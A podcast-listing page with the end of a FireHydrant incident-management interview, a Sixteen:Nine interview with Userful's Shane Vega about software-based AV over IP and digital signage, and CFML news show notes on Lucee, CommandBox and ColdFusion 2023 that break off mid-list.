They say, like, aim behind the person.And that's what we want to do. We just want to aim at solving a problem and then the revenue will come. You have to be smart about it, right? It's not a field of dreams, like, if you build it, like, revenue arrives, but—so you do have to be conscious of the business and the operations and the model that you work within, but it should all be in service of building something that's valuable.Corey: I really want to thank you for taking the time to speak with me. If people want to learn more, where should they go to find you, other than, you know, to their most recent incident page?Robert: [laugh]. No, thanks for having me. So, to learn more about me, I mean, you can find me on Twitter on—or X. What do we call it now?Corey: I call it Twitter because I don't believe in deadnaming except when it's companies.Robert: Yeah [laugh]. twitter.com/bobbytables if you want to find me there. If you want to learn more about FireHydrant and what we're doing to help folks with incidents and incident response and all the fun things in there, it's firehydrant.com or firehydrant.io, but we'll redirect you to dot com.Corey: And we will, of course, put a link to all of that in the [show notes 00:33:10]. Thank you so much for taking the time to speak with me. It's deeply appreciated.Robert: Thank you for having me.Corey: Robert Ross, CEO and co-founder of FireHydrant. This featured guest episode has been brought to us by our friends at FireHydrant, and I'm Corey Quinn. If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice, along with an insulting comment that will never see the light of day because that crappy platform you're using is having an incident that they absolutely do not know how to manage effectively.Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.

Sixteen:Nine
Shane Vega, Userful

Sixteen:Nine

Play Episode Listen Later Jul 26, 2023 37:12


The 16:9 PODCAST IS SPONSORED BY SCREENFEED – DIGITAL SIGNAGE CONTENT Using existing network infrastructure has long been talked up as an efficient way to manage and deliver digital signage solutions in large companies, but the concept has been clouded by concerns - like the cost of additional AV hardware and the impact of all that video on the company network. But we now live in a world where companies support countless video conferencing sessions with piles of users, with little or no latency. Other technologies have also caught up, and computing just keeps getting more powerful. Which is why I was interested in chatting with Shane Vega, VP of Marketing for the Silicon Valley software firm Userful, about his company's AV over IP solutions. The company has its roots in Calgary, Alberta and still does a lot of the R&D work there. Userful first showed up in digital signage circles talking about a different way, using software and endpoints, to drive video walls. But in the last few years it has been much more focused on a broader IP-driven solution that tends to start with control rooms and operations centers, but can also drive things like meeting room displays and digital signage around corporate campuses. There's been a lot of discussion about AV needs converging with IT interests, but from Vega's perspective, that convergence is already firmly in place. Subscribe from wherever you pick up new podcasts. TRANSCRIPT Shane, thank you for joining me. Where are you today?  Shane Vega: I am in sunny Tampa, Florida, where although it's not all that sunny today, we've got some rain, but that's per the norm now.  Now, Userful is in Silicon Valley, but a lot of the developers are in Calgary, right? Shane Vega: Yeah, that's correct. All of our R&D, engineering team, and the like, they're all up in Calgary, Canada. So you're missing the Calgary Stampede this week?  Shane Vega: I am missing the Stampede.  But you know what, I believe they deserve a bit of some good time because they spend the majority of the time avoiding the minus 30-degree weather.  Yeah, I spent a number of years in Calgary, and it's an interesting weather city. Shane Vega: Yeah. You know it's bad when they've developed an entire infrastructure of walkways between buildings to avoid having to go outside.  Yeah, just like Minneapolis.  Shane Vega: Exactly.  All right, so we had a quick chat in the LG booth at Infocomm, and you explained what Userful was up to with its Infinity platform and AV over IP and AV as a Service and so on, and I've seen that. I will wholeheartedly admit I don't totally get it, but how you explained it to me was very interesting, and I thought this would be useful for a lot of people to understand the infrastructure and distribution side of digital signage.  We spend so much time talking about the content and business strategy and all those sorts of things, but behind-the-scenes stuff is awfully important, and maybe we could start out by just explaining what Userful is and does and where you came from because when Userful first came out, it was presented to me as video wall software, and I had a hell of a time wrapping my brain around what it was all about. But I know you guys have evolved quite a bit.  Shane Vega: Yeah. I appreciate that, Dave. To answer your question, Userful has grown exponentially in the last 5+ years. John Marshall, our CEO came on board about 7 years or so ago. My timing might be a little bit off, and when he came into the organization, we were a perpetual software company, so we weren't software as a service, we weren't selling subscriptions. We were selling perpetual software… You'd buy a license and then get that supported?  Shane Vega: Yeah, you'd buy a license then we support it for the duration of however long you wanted to use it, and the license for the software was pretty siloed, right? It was, “Hey, you can buy this operations center license.” Where, to your point, we were just managing content on a video wall.  And it was mostly control rooms, right?  Shane Vega: Mostly control rooms, almost exclusively for a time, and then we evolved into the digital signage world, and it was cloud-based digital signage exclusively. So what most folks are familiar with is hosting up in AWS, giving you some access to dynamic tools for creating templates and the like.  During Infocom, what we've launched and from the time that I just mentioned until about, maybe two and a half years ago or three years ago, we've pivoted the company from perpetual to subscription-based software as a service, and that's who Userful is. We are a software company, and we've been a software company tailored to the needs of the AV industry.  Most currently, we've just released our newest platform, and that's really been the biggest evolution, which is moving away from application-specific deployments into more of a platform approach for AV over IP and that is really the biggest breakthrough development that we've had here, because in the older version of our software, we were a monolithic code base. Again, we were just selling either the operation center software or we were selling some digital signage. Everything was monolithic. It was difficult for our engineering team to manage updates, firmware, bug fixes, and the like. We've now moved to a distributed code base that has given us exceptional flexibility with how we develop our software for the various use cases and applications in the AV industry. So if you think about what you've seen in the conversations you and I have had, essentially, and you hit the nail right on the head, this isn't just about fancy software managing content on a video wall. Can we do that? Of course, we've got feature sets for various different use cases, but there's also the infrastructure piece, and this was my “aha moment” through a different lens at Infocomm.  AV over IP has matured through the years from IP addressable matrix switchers where everything was still very much centralized into IP addressable nodes, encoders, decoders, transmitters, receivers, and all the different AV manufacturers out there have now standardized on this proprietary hardware version of AV over IP, and I started to ask myself the question: what is their value proposition in doing that? And I overheard quite a few folks during this past Infocomm talk about the value of this distributed architecture: enabling flexibility, scalability, augmenting workflows, the total cost of ownership being lower, and I sat there a little bit baffled because these are all the same things that we talk about at Userful and so it really opened up an area where I feel like we do need to evangelize a little bit more about how Userful do AV over IP differently, and that we don't necessitate all of the hardware infrastructure. We truly are a software platform, but because of the IT protocols that currently exist, that's how we developed our software. So when you think about Userful, I've actually positioned us a little bit more as an IT solution than an AV solution, even though our entire solution is built around the AV industry and its needs. The reason I say that is because we're literally a server, non-proprietary, and an endpoint, and that endpoint is software, so our uClient application. In between the two is network infrastructure. There are no end encoders, decoders, transmitters, receivers, and the list goes on. Because we are able to transmit content and aggregate content, meaning we can pull in sources of visual information and audio information into a data library or data store that we manage on our server and distribute that information to any destination or any screen and we do that all with IP protocols.  The same IP protocols, by the way, and this is how I usually get people to have the “aha moment.” If we were having this over a Teams meeting, Dave, or a Zoom meeting, we would be transmitting video two ways. In many cases, multiple participants from multiple regions of the world share two-way audio and video. We would be able to share content from our local computers into that meeting, and nobody would have to go out and buy a proprietary encoder and decoder to make that happen. So using that same infrastructure or those IT protocols that are currently at work, IP protocols like WebRTC for instance, we're able to build a solution that leverages those same advancements for the purposes of AV over IP. It's a bit of a mouthful, but that's what we're doing.  So you wouldn't have been able to do some of that 10-15 years ago because the network infrastructure is a lot of larger corporations hadn't really caught up with that, so you would flood a network if you were using a lot of video and so on, but things have changed.  Shane Vega: Things have changed substantially, and I would even say it's been not even 10-15 years ago, just 5-10 years ago, and the reason I say that is because there are the laws of engineering and physics like Butter's Law, Kryder's Law, Moore's Law, which talks about how rapidly the advancements of, let's say, fiber optic networks, which are doubling every nine months, the amount of bandwidth that you can get between the fiber optic cable or the amount of processing speed that you can get out of a CPU and how fast these advancements are happening.  What we're doing and the way that we're doing it is taxing the CPU of that server. It's also taxing the GPU of that server, the graphics card because those are the two major components that we use for our solution. If you think about just two years ago, Dave, our servers that we were deploying in the field were 8 cores of processors. Right now, I have a server that we've certified that's 192 cores of processors, so we're able to do exceptionally and exceedingly more on a single server, which is why we've actually built our solution to be a data center solution by and large, where you take a big beefy server, you put it in your data center, and you're virtualizing all of the traditional hardware that you would need, and you're managing a wide range of AV endpoints, whether it's digital signage, meeting rooms, operations centers, or what have you.  Is there a baseline for what you need in terms of the network infrastructure?  I'm definitely not an IT Architect, but do you need a CAT6E, or can you do this over Wifi, I don't know, and I suspect a lot of people don't know.  Shane Vega: Yeah, so it's a good question. So again, because we're optimizing for IT protocols, we're able to do a lot, right? From the screen to the switch, we're just really looking for that one-gigabit uplink, which is standard. Most folks are going to have that. From the server to the source to the server and all that infrastructure pulling into the server, we're looking for the 10 gigabit uplink.  So there are some requirements for the network, but nothing that is outside the realms of standard network topology. The real intricacies or the real areas where we get into some deeper discussions are when they have multiple networks that we have to traverse. When you start getting into DOD environments where things have to be air-gapped and there's no internet connectivity and when networks start to get a little bit more complex, that's where we have to begin to get a little bit more intentional about how we design it. Now that said, we haven't yet met a deployment that we couldn't meet the network requirements for, even though some of those were those complex ones. There were two things that particularly interested me.  The first was, as you laid out earlier, that you don't need all these encoders and other bits of hardware to layer into a network to make this happen. So you're cutting out conceivably a lot of capital costs and a lot of potential fail points, and I guess the other thing that intrigues me, and you can talk about that next is or after.  The first question would be the idea that you can use this for multiple aspects. I suspect there are control room data dashboards, and software platforms out there, but one of the things you talked about at Infocomm is that you can cascade this out to do all kinds of different things from operation centers to experience centers off of the same platform.  Shane Vega: Yeah, exactly, Dave, and to answer the first question, you hit the nail on the head with one of my areas of confusion when I was at Infocomm, and I heard people talking about the low total cost of ownership, and they were tying it to these encoders and decoders.  We don't require those things. So when I think about the total cost of ownership, I think about the hard work upfront costs that you don't need to have and the additional BTU output from all of that hardware that you would normally need, that's no longer going to be there, which is going to drive your HVAC costs, right? You don't have all the power consumption. So for green initiatives and companies who are looking to do things, and this is a big one moving forward, folks want to be more green, and get green initiatives going like lower carbon emissions, lowering power consumption by not having all that hardware is yet another total cost of ownership benefit for Userful.  Again, our encoding happens at the one server that we require in that Nvidia graphics card. The decoding is done by a piece of software we developed called the uClient application. Now, where that uClient application resides, we give you tons amount of flexibility. We have integrated it into certain endpoints like Web OS or Tizen or Android. And that gives us the flexibility to be able to load that client application in various different environments and use cases, depending on the display type if it's an LCD, if it's a direct view LED, and how we manage that.  In some cases, we do have a small appliance that you might need at the edge, and that would be one additional piece of hardware per display, depending on the display type, and that's an Android box that we load our uClient application onto if the display doesn't have the ability to integrate with our software.  So if it's a smart display that already has a system on a chip on it, conceivably you don't need that Android box?  Shane Vega: Correct. So now what you're left with, as I said, is just a server with software at the edge, and network infrastructure in between. So ongoing maintenance costs are substantially lower. Initial hardware costs are lower. Your total cost of ownership around all the things I mentioned earlier is going to be lower. Therefore, your refresh costs are going to be lower. Because with hardware, every three to five years, in some cases five to seven years, you're having to do a hardware refresh. It's always tied to CapEx because it's usually proprietary. They have to budget for CapEx renewals of all this hardware.  Because of Userful's deployment model, we can take on an OPEX model for those folks who would benefit from that because your hardware refresh can be built into your standard IT refreshes because you own the hardware. In many cases, as many as we can possibly, push for, we don't provide the server, we want the end user to provide the server, and that way, it gets built into your traditional OPEX refresh, and that way, the only recurring cost is the software.  To your next question about what we spoke about and the benefits of the platform. This is where our software really begins to shine, right? Because our platform is accessible through a web browser, so no proprietary software needs to be downloaded for a user to access it. You access our software through a traditional HTML5 web browser.  Once you access the software through a web browser, the first thing you're going to notice is we have six applications that any user can take advantage of. In most cases, folks aren't trying to eat the elephant hole, right? They'll have a use case like digital signage, or they'll have a use case like meeting rooms or experiential centers or what have you, and that's one of the reasons why we are licensing the server. We're licensing the CPU cores and the number of graphics cards that you need on that server so that if you have a smaller use case, your out-of-pocket costs are gonna be lower because you need a smaller server. But when you log in for the first time, you're gonna see, “Oh, I got this for digital signage, but I didn't know I could run my meeting room here.” or, “I didn't realize that I can do these artistic video walls,” or “I didn't realize I can incorporate these data dashboards from Power BI or Tableau as a native source and share those to any display that Userful is managing.”  The value is seen almost immediately, and so what we do is try to help people understand the peripheral or parallel use cases. So I use digital signage quite a bit, and I gave you this analogy regarding airports at Infocomm, Dave, where at least half a dozen times in the last six to eight months, I've had conversations with various airports, and most of them are pulling us in because they have an operation center. Airport operations center, or security operations center, or what have you, and they'll say, “Hey, we want the Userful software to run the content on these displays and video walls in the operation center,” and when we have these discovery calls, I'll typically ask, “Hey, have you guys thought about the advantages of using our platform to help you with the signage?” And I'm usually shot down rather immediately, and most folks know Airports are convoluted in the way that they deploy their technology. They got various different groups. They're typically siloed, but specifically the airport operations centers, I'll just say, “Hey, look, I get that, but let me just throw this use case out there and see if it lands and hits you as showing value.” You're in an airport operations center. Wouldn't you want to be able to manage the entire network of screens that are currently being used to show baggage, arrivals, departures, signage, and all your wayfinding screens? Would it not be valuable to be able to manage those as part of your airport operations, also, I've noticed in many cases, they'll incorporate security into their AOC. Some of them have independent security operations centers, but in either event, I would tell them. What happens if you have an incident at the airport? Wouldn't you want to be able to take over those screens from the command center that's responsible for monitoring and sending strategic messages to people, depending on what the situation is? If there's a fire, “evacuate.” If god forbids, there's an active shooter, “take shelter in place,” and be able to send strategic messages to various screens all from within your operation center? Well, you can't currently do that because you've got multiple systems driving all of these different AV endpoints.  If you had a single platform, it doesn't just give you the ability to scale your deployment, it gives you the ability to scale your workflow and become more flexible to augment those workflows where I can send strategic messages to screens, I can manage arrivals and baggage from my AOC, if that's such a thing that I need. In addition, we could help you with your meeting rooms. You can walk into a meeting room, and I can help you cast some content in a meeting room and have an impromptu meeting on a drop of a dime, as just a few use cases of what our platform can do. Sometimes, when you have these platforms that say they can do, in your case, at least six different things, there can be compromises. In other words, “Yeah, we can do all these things. That's just none of them are particularly deep, or maybe one of them is deep, and the other ones are so so.”  Do you get that question at all? Shane Vega: Ironically, no. We don't get that question. But it's a question most people should be asking David, and I'll tell you that when that does come up, and it's only come up a handful of times, I'm always very candid about what we can't do as well as what we can do. And there is truth in the fact that we are software as a service, and so there are certain applications that still have roadmap features, candidly, that we're going to continue to augment and build them out.  If you could probably imagine the top three or four of our use cases would be: operations centers, digital signage, meeting rooms, and data dashboards. We do those very well. With experiential environments, we manage those artistic video walls very well. Now when you talk about experiential environments, there are some things that some folks might want to get involved with, but we might have to have some deeper conversations, right?  And that really is around interactivity. Do you want multi-touch video walls, like in a museum for kids or something like that? Where we have some roadmap items to help ensure that multi-touch is what people would expect, where you don't want to have the lag, you don't want to have any of those issues when people are trying to have that fun experience as a child or what have you. So there are certain features that are still roadmap items, but what I will bookend that with is, before coming over to Userful, I worked with one of the larger AV firms globally, and while I worked there, part of my interaction with customers was, “Man, I wish I could do more of these things with a single solution, I have to farm it out to so many folks.”  But more than that, I would have feature requests for the stuff that was out there, and it was always in one ear, out the other. I don't care which manufacturer it was. If I went to some of these larger manufacturers and I said, hey, you really would benefit if you did this or this. It just didn't go anywhere, and then I had a similar conversation with the Userful back in about 2018 at a trade show, I said, look, your software is good, but it really needs these four or five things to really be a competitor in the space that you're looking to deploy, which at the time it was operation centers.  I'd say if it was six months, it was a long time. So within six months, I got a call from the then VP of Sales who said, “Hey, I want to have a meeting with you, Shane. We've incorporated all of your requests into our software,” and that really pivoted my approach to looking at users as, alright, these guys are the future of AV and, little FYI, we actually got that award at Infocomm, the Future of AV award.  But the reason for that was, look, if we're going to be software as a service, then we have to prioritize feature requests from our customers above our own market research or our own gut check, and so that's part of my role here at Userful as VP of Marketing is that I'm also over Product Marketing, which is over the roadmap, and so I get involved in customer calls quite a bit, and I'll hear some of these features that to your initial question is, “Hey, how do you go deeper with these applications?” I look for that feedback, and then I get to go back to the roadmap and go, “Hey, we need to prioritize this, this, and this feature. Push out the other features to the next release. Let's get these done because it's revenue dependent. We've got customers who would value this. Let's get it done!” We take that very seriously here at Userful, and we're at four releases a year, so you'll never have to wait all that long.  So you referenced Airports. I'm curious, in the context of third-party software development, if there's a software company that works in the Airport realm but isn't doing digital signage or some of the things you do, but they want to visualize information on displays, is there an API or something that they could develop to work with Userful or does it have to be Userful development to add that capability on?   Shane Vega: We have an entire program around API. So we do have our own API, currently, it's A REST API, so we can receive tons of different messages and calls to trigger certain reactions within our software. But additionally, that's got its own roadmap in and of itself. So we have our software application roadmap, and then we have our API roadmap where we're going to be developing even deeper integrations and capabilities including, but not limited to, even wanting to create possible easy configuration tools for customers who can use our API to do whatever they want, onsite. Are control rooms and operations centers the gateway for the initial point of contact, the thing that gets people interested, and then other things cascade out of that? Shane Vega: That has been our experience. We call that our land. So we're land and expand through our platform. Let's find the use case. Let's land where it makes sense, and then let's show the power of our expansion, and just because of how the company has evolved, operation centers have been kind of the tip of our spear, and it makes sense because operation centers will use two or three of our applications out of the gate, right? They'll use the operation center software, they'll use meeting rooms for war rooms or situation rooms. They'll also use our trends for dashboards and Power BI integrations, depending on what type of operation center it is, so they usually get value from several of our use cases and applications out of the gate. And if it's a large enough organization and we're typically targeting LDOs (large distributed organizations), they'll have multiple operations centers, which gives us multiple points of connection and interaction and engagement to open up opportunities to talk about the meeting rooms beyond your war room and situation room, or some operation centers are fishbowls, where they want to bring folks in their data center and they just want to use it as a showpiece to show their customers how well they manage their data, and so they might have welcome screens outside, and we'll let them know, “Hey, we can manage those welcome screens for you as well,” and that evolves into a larger digital signage strategy, corporate communications, so on and so forth. These large organizations, do they have separate AV and IT departments, or are they pretty much hiving into IT now?  Shane Vega: So more and more, IT is taking over, but what's happening is it used to be that they have AV specialists on staff, and by and large, it was for the meeting rooms, and in some cases, the digital signage where they had AV technicians or AV specialists on-site, and those were the guys were the gatekeepers to decide what technology gets deployed. Yeah, and get everything working before the meeting starts somehow.  Shane Vega: Exactly. “Who's got HDMI? Who's got DVI?” So to that point, people keep talking about the convergence of AV and IT, and I don't know why. That convergence happened years ago. People are now starting to realize that because of that convergence, the IT organization or the IT departments within these larger organizations are going to be the ones holding the budget and are going to be the ones responsible for managing any AV resources on the network. And so, we have intentionally built our product to cater to those IT stakeholders in the organization. When you say things like, “Hey, you can centrally monitor the entire platform from a web browser,” they really get that right. When you say, “We're an IT solution, we're not an AV solution, which means we're not going to put all this IP addressable hardware on your network,” a lot of the walls come down from their security concerns. You then begin to tell them that, look, you can augment your roles-based access control, and integrate with LDAP. Plus, we give you tools that are IT specific to help you monitor things like, what is the impact on my network? What is my current CPU utilization, or what's my current GPU utilization on the server that we're licensing? We give them all of those tools built into our software. So it's not just AV end-user tools that we're giving. We're also giving those IT tools that help the IT stakeholders manage deployments because we recognize these are going to be larger in scale. They're going to be responsible for a lot. Let's make it easy for them.  When you talk about AV as a service, it's a term I've heard for a while, but you guys go at it quite a bit differently from what you're saying.  Shane Vega: Yeah, we do, and Dave, I struggle with that, because we were flirting with the term AV as a service, and we started to use it quite a bit. But I know, coming from the integration world, that AV as a service historically meant we're going to just finance this stuff, right? We're going to get a leasing program, and we're going to build in the hardware, the software, the services, whatever we can into a monthly payment that makes it nice and easy for you guys. We approach it differently by saying, we are software as a service that's for the AV industry. Therefore, we are AV as a service, meaning, we don't have all that hardware that you have to purchase. You're truly able to deploy all of these AV use cases and manage an entire host of AV applications from within our platform. And we are a software that you pay for based on subscription, typically three-year plans.  That's what we mean when we say AV as a service. It's exactly that. It's a software as a service, which is which is the actual term, which is software as a service for the AV world.  This strikes me as something that probably has a learning curve, as every software platform does, but it is almost something you kind of have to ease your way into? Shane Vega: Believe it or not, not really, and I think that would be more pertinent if somebody was wanting to say, “Hey, I want to use your entire platform right now.” But as I said earlier, most folks are saying, “Hey, I want this operation center,” and they're familiar with Operation Center softwares. They know what they want. They know they want to be able to build custom layouts. They want to manage big, beautiful video walls. They want to be able to interact with sources with soft KVM functionalities so that they're not just visualizing the sources but they can engage with them because they've got tools, right? They got video management tools, and they've got access control, what have you, and so that software that we're providing isn't going to look and feel a whole lot different than a lot of the other softwares they're used to using.  Now, we do it differently. So the real benefit, rewinding all over to the beginning of this conversation, is, yes, we're giving you all these software applications and features, but it's the infrastructure that really differentiates us.  Along with removing different hardware components from this kind of a network, you're also removing potentially different software applications that you'd also need because you've got this stack of different things you can do?  Shane Vega: Yeah, exactly. To that point, Dave, when I showed this at Infocomm, when I gave my demos there, typically when you deploy an AV solution, let's call it digital signage, that's the background that you're most familiar with.  In digital signage, let's say, you use it for corporate communications; you'll have screens all over the office. In some cases, they'll want to be able to integrate that digital signage into their meeting rooms as well, and when the screens are in standby mode, they want to be able to have some of those corporate communications as part of the digital signage strategy, managing those meeting rooms. But when you go into the meeting room, they'll typically need some type of infrastructure to support those meetings and local collaboration. Usually, it's a network of AV infrastructure, HDMI cables, or what have you, go into some form of a matrix switch that's going to be some type of tablet controller that can give you the ability to manage what laptop is being viewed on what screen.  With Userful, because the software does so much, the screens that we manage are not tied to any one specific application, and that's really the beauty of it. So I can walk into a room where they're showing corporate communication. I can sit down, open my laptop, and immediately start a meeting by screencasting whatever's on my laptop onto the screen in that room without connecting a single AV cable. I could then open up my operations center software on that same screen and turn it into an impromptu war room or situation room where I'm pulling in multiple sources and building out customized layouts, and navigating through a crisis. So there are a lot of things that we can do, and it's not dependent on the screen, and, to your point, we've reduced not just the hardware need but the software as well.  All right, Shane, that was super interesting. I know much more about this space than I did half an hour ago. Shane Vega: It's been great talking to you, Dave. I appreciate it. 

Modernize or Die ® Podcast - CFML News Edition
Modernize or Die® - CFML News Podcast for June 6th, 2023 - Episode 197

Modernize or Die ® Podcast - CFML News Edition

Play Episode Listen Later Jun 6, 2023 77:46


2023-06-06 Weekly News - Episode 197Watch the video version on YouTube at https://youtube.com/live/EgfBsmtKEWc?feature=share Hosts:  Gavin Pickin - Senior Developer at Ortus Solutions Brad Wood - Senior Developer at Ortus Solutions Thanks to our Sponsor - Ortus SolutionsThe makers of ColdBox, CommandBox, ForgeBox, TestBox and all your favorite box-es out there. A few ways  to say thanks back to Ortus Solutions: Like and subscribe to our videos on YouTube.  Help ORTUS reach for the Stars - Star and Fork our ReposStar all of your Github Box Dependencies from CommandBox with https://www.forgebox.io/view/commandbox-github  Subscribe to our Podcast on your Podcast Apps and leave us a review Sign up for a free or paid account on CFCasts, which is releasing new content every week BOXLife store: https://www.ortussolutions.com/about-us/shop Buy Ortus's Books 102 ColdBox HMVC Quick Tips and Tricks on GumRoad (http://gum.co/coldbox-tips) Learn Modern ColdFusion (CFML) in 100+ Minutes - Free online https://modern-cfml.ortusbooks.com/ or buy an EBook or Paper copy https://www.ortussolutions.com/learn/books/coldfusion-in-100-minutes   Patreon Support ()We have 40 patreons: https://www.patreon.com/ortussolutions. Big thanks for Kevin Wright who just made a huge BUMP to their Patreon Pledge AmountNews and AnnouncementsOrtus Training - ColdBox Zero to HeroOctober 4th and 5thVenue Confirmation in Progress - will be less than 2 miles from the Mirage.Registration will be open soon!CF Camp Pre Conference Workshop DiscountWe can offer a 30% discount by using the code "OrtusPre30".Thank you for your ongoing support!https://www.eventbrite.com/e/cfcamp-pre-conference-workshops-by-ortus-solutions-tickets-641489421127 ICYMI - Into the Box - RecapITB Recap Video - https://www.youtube.com/watch?v=XVoIZkJd8HE New Releases and UpdatesLucee 5.4.0.65 Release CandidateRemember - Lucee's Minors are MAJOR releasesThe Lucee team is proud to present our next release candidate for the 5.x series.The 5.4 series bumps the minor version (from 5.3), as we had to update some of the underlying java libraries and extensions as the older versions have CVEs or are no longer maintained.All of the java libraries which have been updated in 6 have also been updated in 5.4, with the exception of hsqldb which in this RC is still 2.7.0This includes an important performance fix 7 with logging since 5.3.10.120 (fixed in 5.3.10.125)https://dev.lucee.org/t/lucee-5-4-0-65-release-candidate/12657CommandBox Next - Add Rewrite Map feature similar to Apache Add a new rewrite-map() handler which declares a named map, file it uses (absolute path), and case sensitivity flag Add a new rewrite-map-exists() predicate just for the fun of it which will tell you if a given key exists in the map (apache doesn't have this) Add a new %{map:name-name:mapKey|defaultValue} exchange attribute which mostly follows Apache's syntax.  The only limitation is nested exchange attributes must use [] instead of {} due to an Undertow parsing issue I reported to them yesterday). https://ortussolutions.atlassian.net/browse/COMMANDBOX-1592 CommandBox - Have you say on MariaDBDuring my refactoring of Runwar/CommandBox I was looking at the little MariaDB4j integration that was built into runwar (added about 7 years ago in 2016). There were never first-class settings for it in CommandBox so you would have had to use the runwar.args setting to activate. It also required you to include the MariaDB4j jars yourself in the classpath. (Note this is separate from the MariaDB CommandBox module 4 Jan Janek made).The settings it supported were: enable port base directory data directory SQL file to import So my question is, does anyone use the built in MariaDB4j integration in Runwar? If I removed it, would anyone care? If I put in first-class settings and documented it, would people use it? Does it sound useful? Worthless?https://community.ortussolutions.com/t/mariadb4j-support-in-commandbox-runwar/9666 ICYMI - Adobe ColdFusion 2023 released!!!!We are thrilled to announce the highly anticipated release of Adobe ColdFusion 2023!  Packed with cutting-edge features and enhanced performance, this release takes ColdFusion to new heights of innovation.Experience accelerated development, robust security measures, and seamless integration with modern technologies. From rapid application development to scalable enterprise solutions, Adobe ColdFusion empowers developers to build dynamic web applications with ease. Discover the limitless possibilities and stay ahead in the digital era.Upgrade to the latest version now and harness the true potential of ColdFusion. Elevate your coding experience with Adobe ColdFusion – the ultimate platform for unmatched productivity and success. LDAP and SAML integration Central Configuration Server GraphQL client HTML to PDF Cloud Services JWT integration in CF Whats new - https://helpx.adobe.com/coldfusion/using/whats-new.htmlhttps://coldfusion.adobe.com/2023/05/coldfusion2023-release/ Webinar / Meetups and WorkshopsOnline CF Meetup - "The Many Ways to Run CF (and Lucee)", with Charlie ArehartThursday June 8th - 12pm US Eastern TimeDepending on your experience you may tend to favor running CF and your CFML the way you've "always done it" (perhaps by installing CF, or perhaps via Commandbox). But did you know there are in fact several ways to deploy CF (or Lucee), including ways to run CFML without even needing to do that? In this session, veteran CF consultant Charlie Arehart will identify these, starting first with WHY it's useful to have different ways to be able to deploy CF/Lucee and CFML.Then he will discuss and demonstrate those several ways--whether you prefer to run CF on your own machine or another (whether hosted or in the cloud), to include even being able to run CFML WITHOUT need of CF (or Lucee) to be "installed" at all. He will cover such topics as installers (GUI and console-based), silent installation (and updates), Commandbox, WAR file deployment, container-based (Docker/Kubernetes) deployment, serverless deployment, as well as CLI-based execution of CFML, and execution via cffiddle and trycf, among others.Buckle up, buttercup, for a fast tour of this varied landscape.https://www.meetup.com/coldfusionmeetup/events/293987033/ "OctoPerf: The Load Testing Tool for Modern Web Apps", Guillaume BetailloulouxThursday June 15th at 12pm US Eastern Time, UTC-4:OctoPerf offers an integrated development Interface that you can use from any browser to execute load tests against your application. Find out how you can set up a full-blown test campaign with meaningful user journeys in under 20 minutes.https://www.meetup.com/coldfusionmeetup/events/294018310/ Adobe Upcoming EventsAdobe ColdFusion Workshop WEDNESDAY, JUNE 21, 20239:00 AM CESTOnline Eventhttps://adobe-coldfusion-1day-workshop.meetus.adobeevents.com/ Webinar - Adobe ColdFusion (2023 release) in Docker on Google Cloud Platform FRIDAY, JUNE 23, 202310:00 AM PDTOnline Eventhttps://docker-gcp-coldfusion.meetus.adobeevents.com/ Adobe ColdFusion Workshop WEDNESDAY, JUNE 28, 20239:00 AM EDTOnline Eventhttps://aodbe-coldfusion-1daytraining.meetus.adobeevents.com/ Webinar- Road to Fortuna Series: New Administrator Features in Adobe ColdFusion 2023 WEDNESDAY, JULY 26, 202310:00 AM PDTOnline Eventhttps://administrator-features-adobe-coldfusion.meetus.adobeevents.com/ Adobe ColdFusion Workshop WEDNESDAY, AUGUST 9, 20239:00 AM EDTOnline Eventhttps://adobecf-1day-workshop.meetus.adobeevents.com/ Webinar - Road to Fortuna Series: Exploring the New Google Cloud Platform Features FRIDAY, AUGUST 25, 202310:00 AM PDTOnline Eventhttps://google-cloud-platform-adobe-coldfusion.meetus.adobeevents.com/ CFCasts Content Updateshttps://www.cfcasts.comRecent Releases 2023 ForgeBox Module of the Week Series - 1 new Video https://cfcasts.com/series/2023-forgebox-modules-of-the-week  2023 VS Code Hint tip and Trick of the Week Series - 1 new Video https://cfcasts.com/series/2023-vs-code-hint-tip-and-trick-of-the-week  Watch sessions from previous ITB years Into the Box 2022 - https://cfcasts.com/series/itb-2022  Into the Box 2021 - https://cfcasts.com/series/into-the-box-2021  Into the Box 2020 - https://cfcasts.com/series/itb-2020  Into the Box 2019 - https://cfcasts.com/series/into-the-box-2019  Coming Soon Into the Box 2023 Videos will soon be available for purchase as an EXCLUSIVE PREMIUM package. Subscribers will get access to premium packages after a 6 month exclusive window. More ForgeBox and VS Code Podcast snippet videos ColdBox Elixir from Eric Getting Started with Inertia.js from Eric Conferences and TrainingCFCamp - Pre-Conference - Ortus has 4 TrainingsJune 21st, 2023Held at the CFCamp venue at the Marriott Hotel Munich Airport in Freising. Eric - TestBox: Getting started with BDD-TDD Oh My! Luis - Coldbox 7 - from zero to hero Dan - Legacy Code Conversion To The Modern World Brad - CommandBox Server Deployment for the Modern Age https://www.cfcamp.org/pre-conference.html CF Camp Pre Conference Workshop DiscountWe can offer a 30% discount by using the code "OrtusPre30".Thank you for your ongoing support!https://www.eventbrite.com/e/cfcamp-pre-conference-workshops-by-ortus-solutions-tickets-641489421127 Brad's Video - https://www.youtube.com/watch?v=oD4JBOmIL2ELuis's Video - https://www.youtube.com/watch?v=F1_8xhHjJMM CFCampJune 22-23rd, 2023Marriott Hotel Munich Airport, FreisingCheck out all the great sessions: https://www.cfcamp.org/sessions.htmlCheck out all the great speakers: https://www.cfcamp.org/cfcamp-conference-2023/speakers.html Register now: https://www.cfcamp.org/THAT ConferenceHowdy. We're a full-stack, tech-obsessed community of fun, code-loving humans who share and learn together.We geek-out in Texas and Wisconsin once a year but we host digital events all the time.WISCONSIN DELLS, WI / JULY 24TH - 27TH, 2022A four-day summer camp for developers passionate about learning all things mobile, web, cloud, and technology.https://that.us/events/wi/2023/Our very own Daniel Garcia is speaking there https://that.us/activities/R3eAGT1NfIlAOJd2afY7Adobe CF Summit WestLas Vegas 2-4th of October.Get your early bird passes now. Session passes @ $99 Professional passes @ $199. Early bird open only till June 15th, 2023!Call for Speakers is OPENhttps://cfsummit.adobeevents.com/ https://cfsummit.adobeevents.com/speaker-application/Ortus Training - ColdBox Zero to HeroOctober 4th and 5thVenue Confirmation in Progress - will be less than 2 miles from the Mirage.Registration will be open soon!More conferencesNeed more conferences, this site has a huge list of conferences for almost any language/community.https://confs.tech/Blogs, Tweets, and Videos of the Week5/28/23 - Blog 